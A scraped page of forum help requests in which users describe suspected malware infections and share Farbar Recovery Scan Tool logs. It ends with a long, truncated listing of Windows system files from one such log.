==================== Memory info =========================== Processor: AMD Athlon(tm) II X2 220 Processor Percentage of memory in use: 56% Total physical RAM: 8190.49 MB Available physical RAM: 3545.78 MB Total Virtual: 16379.16 MB Available Virtual: 11688.23 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:931.41 GB) (Free:866.04 GB) NTFS \\?\Volume{98ef4543-8efb-11e3-874e-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: A03D0812) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
  9. Hi, I think I'm infected with a rootkit as I cannot back up my computer with blazeback, install Bitdefender, or use any of the following programs: Malwarebytes Anti-Rootkit, AdwCleaner, HitmanPro, or Zemana AntiMalware. I was able to successfully run MalwareBytes AntiMalware with the 'search for rootkits' (or something like that) checked, but it did not fix the problem. I always run Rkill successfully before attempting to execute these programs with administrative privileges and still get the 'The requested resource is in use.' error. I ran the Farbar Recovery Scan Tool (x64) for Windows and attached the created FRST.txt and Addition.txt log files as I've seen in multiple threads. Thanks for any help! FRST.txt Addition.txt
  10. Hello, in response to Infected by CCleaner windows 64bit (Cupcake), I hope someone could please look at my scans. I ran a Malwarebytes scan the day after finding out the 5.33 download was hacked; it found the malware and I quarantined and deleted it. I then did my best to try and restore back to before the infection took hold. I don't know how well that worked; when I scan with MWB it's clean. Attached are the Farbar and Addition files. Please advise when you can, thank you very much. Do I need to do anything else at this point? P.S. (It was on my Windows 7 too; did the Malware scan, quar, delete and back up restore to earlier point.) Mike - a humble appreciative customer. Addition.txt FRST.txt
  11. Hello and salutations! I am in a bit of a predicament where I cannot install Malwarebytes nor any other antivirus programs. I have tried running mbar, mbam but got errors. Eset helped, somewhat, but not the underlying problem of installing an antivirus. My Google Kung Fu somehow got me to where the registry settings are for Windows Defender, and I got that back up and running, but it's not getting rid of the actual viruses/malware/trojans/etc. I did get somewhere with FRST64.exe, but I do not know how to interpret the FRST.txt nor the Addition.txt (attached below). I'm running a MacBook Pro (early 2008) with a Windows 10 partition. I can boot the OS just fine and I have a recovery disk to get into the troubleshooting command prompt. I would greatly appreciate help with the fixlist.txt, and I know it can take about 24-48 hours to get a reply. I've had this problem for about a week now and only now do I swallow my pride and ask for help. Thank you for your time and hard work. FRST.txt Addition.txt P.S. If I have done something wrong (according to the forum code of conduct), I apologize in advance. I have literally never asked for help on a forum, ever.
  12. Over the weekend something happened to my Malwarebytes premium software. It now takes 10 to 12 hours to run a threat scan, which I have set up to run daily. It used to take about an hour. Any suggestions? I did get a pop-up that said something was recently disabled on my Malwarebytes program. I also received a call on my phone from someone saying my computer was hacked; my wife hung up on them, maybe she shouldn't have...
  13. Hello, my computer is already infected. I am unable to run Malwarebytes. It "cannot connect to the service". I ran the anti-rootkit tool. It gave me the "DDA Driver was not installed" error. I downloaded the FARBAR toolkit, executed it, and it has created the attached 'FRST.txt' and 'Addition.txt' files. Please note that FARBAR crashed, so the .TXT files may not be complete. Please help! Thanks, Mike FRST.txt Addition.txt
  14. Hi, I have a virus and I decided to scan my computer more deeply with the Farbar scan tool; this is what I had. Can you help me to read it and to make a fix file? Thank you very much. Addition.txt FRST.txt
  15. We need some help removing a potential unwanted malware called $360Section. Malwarebytes or McAfee doesn't seem to detect it or remove it. I found another post on this forum from many months ago (17-July-2015) and the general help idea was to use Farbar. HOWEVER, someone named "TwinHeadedEagle" was helping and noted that, "This fix was created for this user for use on that particular machine. Running it on another one may cause damage and render the system unstable." So... now I'm trying to use Farbar and remove $360Section, and I don't want to assume the "fix" for the other person would be the same for me. This is where I need help. So far I've downloaded Farbar, saved it to the Desktop, run it as administrator (with all options checked), and have the Addition.txt and Shortcut.txt and FRST.txt files saved. I will attach them for your viewing pleasure. I'm not sure what to do now. I'm using an ASUS laptop, 1.33GHz, 30GB HD, 2GB RAM, 32-bit, Windows 10. Addition.txt FRST.txt Shortcut.txt
  16. Hey, if someone could take a peek at this and help me out I would appreciate it. I've run ESET Powelinks, Rogue Killer, MBAR, ComboFix, ADWCleaner, JRT, FRST64. I can post all the logs if needed but if we can just use these for now that would save me time. Thank you ahead of time and like I said I can post others if need be or even start fresh. Addition.txt FRST.txt
  17. Greetings everyone, it seems I'm not lucky even on my birthday. Last night I saw the notorious "Wawtrak" trojan in system32/usp10.dll pop up warning from MalwareBytes, but unfortunately I did not ignore it. Usually I'm very careful when it comes to system files so I don't know what I was thinking. Anyway, I ran a scan, it found two instances of it, the software "fixed" it and asked me to restart. Needless to say... immediate blue screen flash on Windows startup, and Windows start up repair which, as usual, does nothing. Of course, I can't boot Windows now. Windows Recovery disc can't actually do anything but run the startup repair, run system restore (doesn't work) and open CMD which is probably my only solution. I tried running a scan with "Farbar Recovery Scan Tool", and attached the log here. I have yet to ask on other boards about the rules of practice of that tool so I can use it myself, but my question is this: Is there a way I can "unquarantine" the .dlls, return them to their normal state and location, and thus hopefully fix my PC, using Command Prompt? If not, can you help me with the FRST log? The mentioned usp10.dll was specified as "Known DLLs whitelist". I am sorry, but I had utorrent installed already and now that I have registered here, I am aware you don't like seeing P2P software on logs or anywhere. However my computer is unbootable and unfortunately I can't change that. Sincerely, tetrarch FRST.txt
  18. Hello, my name is Ed. I could not find help for this problem in Brazil. Hello friends, I ask your help. My computer is very strange and when I try to run the Farbar Recovery Scan or FSS it quickly opens and closes. Could you help me? I tried to overtake Malware Bytes but nothing was found. I need your help.
  19. Hello, I am in great need of somebody to help me with my malware removal process. I have followed instructions from other threads but need somebody experienced to write me a fixlist.txt from my logs. I have dl'ed adwcleaner and frst.exe. I have the scan logs, which I will post subsequent to this, but I do not know if the information will change by the time I receive feedback because several people may use this computer by the time I get a reply. Thanks for any help provided!
  20. I have just run the Farbar Report and here are my results in the FRST.txt.
(Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 
00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:11 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll 2015-04-17 10:01 - 2015-03-17 00:01 - 03976632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe 2015-04-17 10:01 - 2015-03-17 00:01 - 03920824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe 2015-04-17 10:01 - 2015-03-16 23:59 - 01309696 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\ntdll.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll 2015-04-17 10:01 - 2015-03-16 23:57 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe 2015-04-17 10:01 - 2015-03-16 23:56 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe 2015-04-17 10:01 - 2015-03-16 23:56 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2015-04-17 10:01 - 2015-03-16 23:56 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll 2015-04-17 10:01 - 2015-03-16 23:53 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll 2015-04-17 10:01 - 2015-03-16 23:53 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll 
2015-04-17 10:01 - 2015-03-16 23:50 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 
23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 23:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 22:45 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe 2015-04-17 10:01 - 2015-03-16 22:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe 2015-04-17 10:01 - 2015-03-16 22:43 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 22:43 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 22:43 - 00003584 ____H (Microsoft Corporation) 
C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll 2015-04-17 10:01 - 2015-03-16 22:43 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll 2015-04-17 10:01 - 2015-03-12 23:32 - 24980480 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2015-04-17 10:01 - 2015-03-12 23:25 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2015-04-17 10:01 - 2015-03-12 23:25 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2015-04-17 10:01 - 2015-03-12 23:09 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2015-04-17 10:01 - 2015-03-12 23:08 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2015-04-17 10:01 - 2015-03-12 23:08 - 00417280 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2015-04-17 10:01 - 2015-03-12 23:08 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2015-04-17 10:01 - 2015-03-12 23:07 - 02886144 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2015-04-17 10:01 - 2015-03-12 23:06 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2015-04-17 10:01 - 2015-03-12 23:00 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2015-04-17 10:01 - 2015-03-12 22:59 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2015-04-17 10:01 - 2015-03-12 22:55 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2015-04-17 10:01 - 2015-03-12 22:54 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2015-04-17 10:01 - 2015-03-12 22:54 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2015-04-17 10:01 - 2015-03-12 22:53 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2015-04-17 10:01 - 2015-03-12 22:50 - 06025216 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2015-04-17 10:01 - 2015-03-12 22:44 - 
00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2015-04-17 10:01 - 2015-03-12 22:42 - 19695616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2015-04-17 10:01 - 2015-03-12 22:42 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2015-04-17 10:01 - 2015-03-12 22:40 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2015-04-17 10:01 - 2015-03-12 22:32 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2015-04-17 10:01 - 2015-03-12 22:28 - 00503296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2015-04-17 10:01 - 2015-03-12 22:28 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2015-04-17 10:01 - 2015-03-12 22:27 - 00340992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2015-04-17 10:01 - 2015-03-12 22:27 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2015-04-17 10:01 - 2015-03-12 22:27 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll 2015-04-17 10:01 - 2015-03-12 22:26 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2015-04-17 10:01 - 2015-03-12 22:26 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2015-04-17 10:01 - 2015-03-12 22:23 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2015-04-17 10:01 - 2015-03-12 22:22 - 02278400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2015-04-17 10:01 - 2015-03-12 22:20 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2015-04-17 10:01 - 2015-03-12 22:20 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2015-04-17 10:01 - 2015-03-12 22:17 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2015-04-17 10:01 - 2015-03-12 22:16 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2015-04-17 10:01 - 2015-03-12 22:15 
- 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2015-04-17 10:01 - 2015-03-12 22:08 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2015-04-17 10:01 - 2015-03-12 22:07 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2015-04-17 10:01 - 2015-03-12 22:06 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2015-04-17 10:01 - 2015-03-12 22:05 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2015-04-17 10:01 - 2015-03-12 22:05 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2015-04-17 10:01 - 2015-03-12 22:01 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2015-04-17 10:01 - 2015-03-12 22:00 - 14397440 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2015-04-17 10:01 - 2015-03-12 21:57 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2015-04-17 10:01 - 2015-03-12 21:56 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2015-04-17 10:01 - 2015-03-12 21:54 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2015-04-17 10:01 - 2015-03-12 21:49 - 04305408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2015-04-17 10:01 - 2015-03-12 21:45 - 02358784 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2015-04-17 10:01 - 2015-03-12 21:44 - 00689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2015-04-17 10:01 - 2015-03-12 21:43 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2015-04-17 10:01 - 2015-03-12 21:42 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2015-04-17 10:01 - 2015-03-12 21:34 - 12825600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2015-04-17 10:01 - 2015-03-12 21:33 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2015-04-17 10:01 - 2015-03-12 21:22 - 
00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2015-04-17 10:01 - 2015-03-12 21:20 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2015-04-17 10:01 - 2015-03-12 21:16 - 01311232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2015-04-17 10:01 - 2015-03-12 21:14 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2015-04-17 10:01 - 2015-03-09 22:25 - 01882624 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2015-04-17 10:01 - 2015-03-09 22:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll 2015-04-17 10:01 - 2015-03-09 22:08 - 01237504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll 2015-04-17 10:01 - 2015-03-09 22:05 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll 2015-04-17 10:01 - 2015-03-05 00:12 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2015-04-17 10:01 - 2015-03-04 23:05 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll 2015-04-17 10:01 - 2015-02-24 22:18 - 00754688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys 2015-04-17 10:01 - 2015-01-30 18:56 - 00459336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys 2015-04-17 10:01 - 2015-01-27 18:36 - 01239720 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe 2015-04-17 09:58 - 2015-03-03 23:55 - 00367552 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys 2015-04-17 09:58 - 2015-03-03 23:41 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\clfsw32.dll 2015-04-17 09:58 - 2015-03-03 23:10 - 00058880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\clfsw32.dll 2015-04-16 12:42 - 2015-04-16 12:42 - 00000000 ____D () C:\Users\tboe\AppData\Local\Adobe 2015-04-16 10:21 - 2015-04-23 14:00 - 00000070 _____ () C:\Users\tboe\AppData\Roaming\WB.CFG 2015-04-16 10:19 - 2015-04-16 10:19 - 00000000 ____D () C:\Users\tboe\AppData\Local\CrashDumps 2015-04-06 
21:49 - 2014-06-30 17:24 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll 2015-04-06 21:49 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll 2015-04-06 21:49 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe 2015-04-06 21:49 - 2014-06-06 01:12 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe 2015-04-06 21:49 - 2014-03-09 16:48 - 01389208 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe 2015-04-06 21:49 - 2014-03-09 16:48 - 00171160 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll 2015-04-06 21:49 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe 2015-04-06 21:49 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll 2015-04-06 18:42 - 2015-04-17 10:19 - 00000600 _____ () C:\Users\tboe\AppData\Local\PUTTY.RND 2015-04-06 18:35 - 2015-04-17 10:19 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\FileZilla 2015-04-06 18:35 - 2015-04-06 18:35 - 06420600 _____ (Tim Kosse) C:\Users\tboe\Downloads\FileZilla_3.10.3_win64-setup [1].exe 2015-04-06 18:35 - 2015-04-06 18:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client 2015-04-06 18:35 - 2015-04-06 18:35 - 00000000 ____D () C:\Program Files\FileZilla FTP Client 2015-04-06 18:34 - 2015-04-06 18:34 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\PriceFountain 2015-04-06 18:32 - 2015-04-06 18:32 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\Macromedia 2015-04-06 18:28 - 2015-04-06 18:28 - 00000000 __SHD () C:\Users\tboe\AppData\Local\EmieUserList 2015-04-06 18:28 - 2015-04-06 18:28 - 00000000 __SHD () C:\Users\tboe\AppData\Local\EmieSiteList 2015-04-06 18:28 - 2015-04-06 18:28 - 00000000 __SHD () C:\Users\tboe\AppData\Local\EmieBrowserModeList 2015-04-06 18:27 - 2015-04-16 11:20 - 00000000 ____D () C:\PTC_Projects 2015-04-06 18:25 
